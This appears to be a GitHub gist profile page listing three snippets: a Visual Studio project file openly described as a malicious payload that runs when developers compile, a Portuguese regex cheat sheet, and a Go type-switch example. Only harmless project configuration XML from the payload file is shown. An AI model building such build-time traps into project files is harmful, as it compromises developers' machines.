Skip to content

Instantly share code, notes, and snippets.

View blkzy's full-sized avatar
🍺

Matheus blkzy

🍺
  • Brasil
  • 09:20 (UTC -03:00)
View GitHub Profile
@blkzy
blkzy / Payload Microsoft Visual Studio.vcxproj
Last active April 15, 2023 17:34
Malicious payload targeted at developers using Microsoft Visual Studio. Runs the payload when compiling a single program.
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
@blkzy
blkzy / regex.md
Created March 14, 2022 02:35 — forked from alexandreservian/regex.md
Metacaracteres Regex

Representantes

Meta Nome Função
. ponto um caractere qualquer
[] conjunto conjunto de caracteres permitidos
[^] conjunto negado conjunto de caracteres proibidos

Quantificadores

@blkzy
blkzy / main.go
Last active March 13, 2021 16:08
Identifying what type of value the interface loads
package main
import "fmt"
func main() {
identifyType(true)
identifyType([]string{})
identifyType("Hello World")
identifyType(0)
identifyType([]int{})